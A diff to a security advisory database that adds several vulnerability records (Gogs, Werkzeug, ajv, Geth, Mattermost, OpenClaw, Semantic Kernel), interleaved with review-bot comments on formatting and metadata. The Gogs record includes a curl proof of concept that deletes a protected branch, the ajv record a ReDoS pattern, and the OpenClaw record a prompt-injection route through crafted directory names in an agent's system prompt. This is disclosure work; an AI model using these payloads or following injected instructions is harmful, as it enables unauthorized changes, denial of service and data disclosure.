\n\n \n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/QuantumNous/new-api"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.10.8-alpha.9"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/QuantumNous/new-api"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-23T22:10:25Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json
new file mode 100644
index 0000000000000..1d6629b5fd33b
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-29vq-49wr-vm6x",
+ "modified": "2026-02-23T22:27:37Z",
+ "published": "2026-02-19T20:32:45Z",
+ "aliases": [
+ "CVE-2026-27199"
+ ],
+ "summary": " Werkzeug safe_join() allows Windows special device names",
+ "details": "Werkzeug's `safe_join` function allows Windows device names as filenames if when preceded by other path segments.\n\nThis was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that `safe_join` accepts paths with multiple segments, such as `example/NUL`.\n\n`send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "werkzeug"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.1.6"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/pallets/werkzeug"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pallets/werkzeug/releases/tag/3.1.6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-67"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T20:32:45Z",
+ "nvd_published_at": "2026-02-21T06:17:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json
new file mode 100644
index 0000000000000..8bd8089cfb6b0
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json
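Review bot: The new `summary` value begins with a stray space, `" Werkzeug safe_join() allows Windows special device names"`, which will surface as leading whitespace in any title rendered from this field and will not match a trimmed lookup; it should read `"summary": "Werkzeug safe_join() allows Windows special device names"`. The first sentence of `details` also has a typo, `as filenames if when preceded by other path segments`, which reads correctly as `as filenames when preceded by other path segments`. Both are text-only corrections to the new file; the vector, ranges and references are unaffected.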
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c6v-8r3v-gh6p", + "modified": "2026-02-19T21:14:56Z", + "published": "2026-02-17T18:43:00Z", + "aliases": [ + "CVE-2026-25232" + ], + "summary": "Gogs has a Protected Branch Deletion Bypass in Web Interface", + "details": "## Summary\n\nAn access control bypass vulnerability in Gogs web interface allows any repository collaborator with Write permissions to delete protected branches (including the default branch) by sending a direct POST request, completely bypassing the branch protection mechanism. This vulnerability enables privilege escalation from Write to Admin level, allowing low-privilege users to perform dangerous operations that should be restricted to administrators only.\n\nAlthough Git Hook layer correctly prevents protected branch deletion via SSH push, the web interface deletion operation does not trigger Git Hooks, resulting in complete bypass of protection mechanisms.\n\n## Details\n\n### Affected Component\n\n- **File**: `internal/route/repo/branch.go`\n- **Function**: `DeleteBranchPost` (lines 110-155)\n- **Route Configuration**: `internal/cmd/web.go:589`\n ```go\n m.Post(\"/delete/*\", reqSignIn, reqRepoWriter, repo.DeleteBranchPost)\n ```\n\n### Root Cause\n\nThe `DeleteBranchPost` function performs the following checks when deleting a branch:\n1. ✅ User authentication (`reqSignIn`)\n2. ✅ Write permission check (`reqRepoWriter`)\n3. ✅ Branch existence verification\n4. ✅ CommitID matching (optional parameter)\n5. ❌ **Missing protected branch check**\n6. 
❌ **Missing default branch check**\n\nWhile the UI layer (`internal/route/repo/issue.go:646-658`) correctly checks protected branch status and hides the delete button, attackers can directly construct POST requests to bypass UI restrictions.\n\n### Vulnerable Code\n\n**Vulnerable implementation** (`internal/route/repo/branch.go:110-155`):\n\n```110:155:internal/route/repo/branch.go\nfunc DeleteBranchPost(c *context.Context) {\n\tbranchName := c.Params(\"*\")\n\tcommitID := c.Query(\"commit\")\n\n\tdefer func() {\n\t\tredirectTo := c.Query(\"redirect_to\")\n\t\tif !tool.IsSameSiteURLPath(redirectTo) {\n\t\t\tredirectTo = c.Repo.RepoLink\n\t\t}\n\t\tc.Redirect(redirectTo)\n\t}()\n\n\tif !c.Repo.GitRepo.HasBranch(branchName) {\n\t\treturn\n\t}\n\tif len(commitID) > 0 {\n\t\tbranchCommitID, err := c.Repo.GitRepo.BranchCommitID(branchName)\n\t\tif err != nil {\n\t\t\tlog.Error(\"Failed to get commit ID of branch %q: %v\", branchName, err)\n\t\t\treturn\n\t\t}\n\n\t\tif branchCommitID != commitID {\n\t\t\tc.Flash.Error(c.Tr(\"repo.pulls.delete_branch_has_new_commits\"))\n\t\t\treturn\n\t\t}\n\t}\n\n\t// 🔴 Vulnerability: Missing protected branch check here\n\t// Should add check like:\n\t// protectBranch, err := database.GetProtectBranchOfRepoByName(c.Repo.Repository.ID, branchName)\n\t// if protectBranch != nil && protectBranch.Protected { ... 
}\n\n\tif err := c.Repo.GitRepo.DeleteBranch(branchName, git.DeleteBranchOptions{\n\t\tForce: true,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to delete branch %q: %v\", branchName, err)\n\t\treturn\n\t}\n\n\tif err := database.PrepareWebhooks(c.Repo.Repository, database.HookEventTypeDelete, &api.DeletePayload{\n\t\tRef: branchName,\n\t\tRefType: \"branch\",\n\t\tPusherType: api.PUSHER_TYPE_USER,\n\t\tRepo: c.Repo.Repository.APIFormatLegacy(nil),\n\t\tSender: c.User.APIFormat(),\n\t}); err != nil {\n\t\tlog.Error(\"Failed to prepare webhooks for %q: %v\", database.HookEventTypeDelete, err)\n\t\treturn\n\t}\n}\n```\n\n**Correct implementation in Git Hook** (`internal/cmd/hook.go:122-125`):\n\n```go\n// check and deletion\nif newCommitID == git.EmptyID {\n fail(fmt.Sprintf(\"Branch '%s' is protected from deletion\", branchName), \"\")\n}\n```\n\n**Correct UI layer check** (`internal/route/repo/issue.go:646-658`):\n\n```go\nprotectBranch, err := database.GetProtectBranchOfRepoByName(pull.BaseRepoID, pull.HeadBranch)\nif err != nil {\n\tif !database.IsErrBranchNotExist(err) {\n\t\tc.Error(err, \"get protect branch of repository by name\")\n\t\treturn\n\t}\n} else {\n\tbranchProtected = protectBranch.Protected\n}\n\nc.Data[\"IsPullBranchDeletable\"] = pull.BaseRepoID == pull.HeadRepoID &&\n\tc.Repo.IsWriter() && c.Repo.GitRepo.HasBranch(pull.HeadBranch) &&\n\t!branchProtected // UI layer has check, but backend doesn't\n```\n## PoC\n\n### Prerequisites\n\n1. Have Write permissions to the target repository (collaborator or team member)\n2. Target repository has protected branches configured (e.g., main, master, develop)\n3. 
Access to Gogs web interface\n\n#### Send Malicious POST Request\n```bash\n# Directly send DELETE request bypassing UI protection\ncurl -X POST \\\n -b cookies.txt \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"_csrf=YOUR_CSRF_TOKEN\" \\\n \"https://gogs.example.com/username/repo/branches/delete/main\"\n```\n\"image\"\n\n## Impact\n- **Bypass branch protection mechanism**: The core function of protected branches is to prevent deletion, and this vulnerability completely undermines this mechanism\n- **Delete default branch**: Can cause repository to become inaccessible (git clone/pull failures)\n- **Bypass code review**: After deleting protected branch, can push new branch bypassing Pull Request requirements\n- **Privilege escalation**: Writer permission users can perform operations that should only be allowed for Admins", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "gogs.io/gogs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.14.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/security/advisories/GHSA-2c6v-8r3v-gh6p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25232" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/pull/8124" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/commit/7b7e38c88007a7c482dbf31efff896185fd9b79c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gogs/gogs" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/releases/tag/v0.14.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T18:43:00Z", + "nvd_published_at": "2026-02-19T07:17:45Z" + } +} \ No newline at end of 
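Review bot: The `details` string contains a bare `\"image\"` line directly after the bash fence (`...delete/main\"\n```\n\"image\"\n\n## Impact`), which reads as a leftover from an image attachment that was dropped when the advisory text was imported; it should be removed or replaced with the intended link so it does not render as a stray quoted word. The Go listing in the same text uses the fence info string `110:155:internal/route/repo/branch.go`, which is not a language identifier, so that block will likely render without highlighting; `go` as the info string, with the path kept in the preceding sentence, would render reliably. The affected range (`0` to `0.14.1`) and the PR, commit and release references are consistent with each other.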
file diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json new file mode 100644 index 0000000000000..d88bb33cb349a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json 
@@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g4f-4pwh-qvx6", + "modified": "2026-02-23T22:40:29Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-69873" + ], + "summary": "ajv has ReDoS when using `$data` option", + "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0-alpha.0" + }, + { + "fixed": "8.18.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2586" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" + }, + { + "type": "WEB", + "url": 
"https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ajv-validator/ajv" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333", + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T16:38:57Z", + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json new file mode 100644 index 0000000000000..8bb5175975be1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json 
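Review bot: The example pattern in `details` is over-escaped: the JSON text `\\\"^(a|a)*$\\\"` decodes to a literal `\"^(a|a)*$\"` in the rendered Markdown, so readers see backslashes and quotes that are not part of the pattern; inside the existing backticks it should be just `` `^(a|a)*$` ``. The `ADVISORY` reference pointing at `https://github.com/advisories/GHSA-2g4f-4pwh-qvx6` is a self-reference to this very record, unlike the other new records on this page, which list the upstream repository advisory; if ajv published no repository advisory that is fine, but it is worth confirming rather than leaving the database pointing at itself. The two `affected` entries for the same `ajv` package are valid OSV and match the fixed versions given in `details` and in the release-tag references.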
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gjw-fg97-vg3r", + "modified": "2026-02-20T16:46:27Z", + "published": "2026-02-18T22:35:15Z", + "aliases": [ + "CVE-2026-26314" + ], + "summary": "Go Ethereum affected by DoS via malicious p2p message", + "details": "### Impact\n\nA vulnerable node can be forced to shutdown/crash using a specially crafted message.\nMore details to be released later.\n\n### Patches\n\nThe problem is resolved in the v1.16.9 and v1.17.0 releases of Geth.\n\n### Credit\n\nThis issue was reported to the Ethereum Foundation Bug Bounty Program by Waleed Ahmed from vulsight.com", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/ethereum/go-ethereum" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.16.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/go-ethereum" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/releases/tag/v1.16.9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:35:15Z", + "nvd_published_at": "2026-02-19T22:16:46Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json new file mode 100644 index 0000000000000..fa79c68079351 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json 
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2phx-frhf-xr55",
+ "modified": "2026-02-19T19:34:32Z",
+ "published": "2026-02-16T12:30:24Z",
+ "aliases": [
+ "CVE-2026-0997"
+ ],
+ "summary": "Mattermost Plugin Zoom allows any logged-in user to change Zoom meeting restrictions for arbitrary channels",
+ "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 and Mattermost Plugin Zoom versions <=1.11.0 fail to validate the authenticated user when processing {{/plugins/zoom/api/v1/channel-preference}}, which allows any logged-in user to change Zoom meeting restrictions for arbitrary channels via crafted API requests.. Mattermost Advisory ID: MMSA-2025-00558",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-plugin-zoom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.11.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0997"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mattermost/mattermost-plugin-zoom/commit/a8b58c43625ab25746e451acc4f71515d52c8122"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost-plugin-zoom"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T19:34:32Z",
+ "nvd_published_at": "2026-02-16T10:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json
new file mode 100644
index 0000000000000..a0a0c5b5f1d21
--- /dev/null
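Review bot: The affected range and the `details` text disagree on whether plugin version 1.11.0 is vulnerable: `details` says `Mattermost Plugin Zoom versions <=1.11.0` are affected, while the events list `"fixed": "1.11.0"`, which classifies 1.11.0 as patched. One of the two has to change — either `"fixed": "1.11.1"` if 1.11.0 is the last vulnerable release, or the text should read `< 1.11.0`; the referenced fix commit or the plugin's release history would settle which. The `details` value also carries Jira-style braces around the endpoint path, `{{/plugins/zoom/api/v1/channel-preference}}`, and a doubled period in `crafted API requests..`, both of which look like import artifacts from the vendor advisory. The server versions named in `details` (11.1.x, 10.11.x, 11.2.x) have no corresponding `affected` entry; if the plugin is the only vulnerable component that is acceptable, but it is worth stating so the server ranges are not read as a missing entry.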
+++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qj5-gwg2-xwc4", + "modified": "2026-02-20T16:46:56Z", + "published": "2026-02-18T22:42:29Z", + "aliases": [ + "CVE-2026-27001" + ], + "summary": "OpenClaw: Unsanitized CWD path injection into LLM prompts", + "details": "## Overview\nOpenClaw embedded the current working directory (workspace path) into the agent system prompt without sanitization. If an attacker can cause OpenClaw to run inside a directory whose name contains control/format characters (for example newlines or Unicode bidi/zero-width markers), those characters could break the prompt structure and inject attacker-controlled instructions.\n\n## Impact\nPrompt injection may alter agent behavior and could lead to unintended tool use or disclosure of sensitive information.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Vulnerable versions: `< 2026.2.15` (latest published vulnerable version as of 2026-02-16: `2026.2.14`)\n- Patched versions: `>= 2026.2.15`\n\n## Fix\nThe workspace path is now sanitized before it is embedded into any LLM prompt output, stripping Unicode control/format characters and explicit line/paragraph separators. 
Workspace path resolution also applies the same sanitization as defense-in-depth.\n\n## Fix Commit(s)\n- `6254e96acf16e70ceccc8f9b2abecee44d606f79`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:42:29Z", + "nvd_published_at": "2026-02-20T00:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index 906376b23efae..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json 
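Review bot: `cwe_ids` lists `CWE-77` (command injection), but the issue described in `details` is attacker-controlled text breaking the structure of an LLM system prompt, not an OS command line; `CWE-1427` (Improper Neutralization of Input Used for LLM Prompting) is the specific match, with `CWE-74` as the generic injection parent if the database does not yet map 1427. The range (`0` to `2026.2.15`) agrees with the `Vulnerable versions: < 2026.2.15` line in `details`, and the commit in `references` matches the one named under `Fix Commit(s)`.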
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-06T21:43:53Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.70.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.70.0). Users should upgrade to version 1.70.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? 
Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", @@ -17,8 +17,8 @@ "affected": [ { "package": { - "ecosystem": "NuGet", - "name": "Microsoft.SemanticKernel.Core" + "ecosystem": "PyPI", + "name": "semantic-kernel" }, "ranges": [ { @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "1.70.0" + "fixed": "1.39.3" } ] } @@ -36,8 +36,8 @@ }, { "package": { - "ecosystem": "PyPI", - "name": "semantic-kernel" + "ecosystem": "NuGet", + "name": "Microsoft.SemanticKernel.Core" }, "ranges": [ { 
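Review bot: The rewritten `details` now says the fix shipped in `Microsoft.SemanticKernel.Plugins.Core version 1.71.0`, but the NuGet `affected` entry added by the `@@ -36,8` hunk on this same line still names `"name": "Microsoft.SemanticKernel.Core"`, and the `@@ -47,7` hunk on the next line pins its `"fixed": "1.71.0"`, so the package name and the fix version now refer to two different NuGet packages. If the patched package really is `Microsoft.SemanticKernel.Plugins.Core`, the entry should read `"name": "Microsoft.SemanticKernel.Plugins.Core"`; otherwise the `details` text and NuGet link should go back to the Core package — the NuGet page linked in `details` would confirm which. Swapping the order of the PyPI and NuGet entries is otherwise harmless, since the order of `affected` entries is not meaningful in the schema.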
@@ -47,7 +47,7 @@
 "introduced": "0"
 },
 {
- "fixed": "1.39.3"
+ "fixed": "1.71.0"
 }
 ]
 }
diff --git a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json
index 624c28abfcc61..f8331a758a47e 100644
--- a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json
+++ b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json
@@ -51,7 +51,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-522"
 ],
 "severity": "MODERATE",
 "github_reviewed": true,
